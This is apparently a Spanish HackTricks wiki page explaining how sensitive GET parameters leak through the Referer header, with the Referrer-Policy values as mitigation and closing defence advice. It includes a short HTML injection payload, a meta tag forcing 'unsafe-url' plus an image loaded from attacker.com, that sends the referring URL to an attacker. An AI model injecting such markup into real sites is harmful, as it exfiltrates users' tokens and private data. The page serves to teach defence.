3.6 KiB
{% hint style="success" %}
Aprende y practica Hacking en AWS: Entrenamiento HackTricks AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: Entrenamiento HackTricks GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.
Cabeceras de Referencia y política
Referer es la cabecera utilizada por los navegadores para indicar cuál fue la página previamente visitada.
Información sensible filtrada
Si en algún momento dentro de una página web se encuentra información sensible en los parámetros de una solicitud GET, si la página contiene enlaces a fuentes externas o un atacante es capaz de hacer/sugerir (ingeniería social) que el usuario visite una URL controlada por el atacante. Podría ser capaz de extraer la información sensible dentro de la última solicitud GET.
Mitigación
Puedes hacer que el navegador siga una política de Referer que podría evitar que la información sensible se envíe a otras aplicaciones web:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Contramedida
Puedes anular esta regla utilizando una etiqueta meta de HTML (el atacante necesita explotar una inyección de HTML):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Defensa
Nunca coloque datos sensibles dentro de los parámetros GET o en las rutas de la URL.
{% hint style="success" %}
Aprenda y practique Hacking en AWS:Entrenamiento HackTricks AWS Red Team Expert (ARTE)
Aprenda y practique Hacking en GCP: Entrenamiento HackTricks GCP Red Team Expert (GRTE)
Apoye a HackTricks
- Consulte los planes de suscripción!
- Únase al 💬 grupo de Discord o al grupo de telegram o síganos en Twitter 🐦 @hacktricks_live.
- Comparta trucos de hacking enviando PRs a los repositorios de HackTricks y HackTricks Cloud.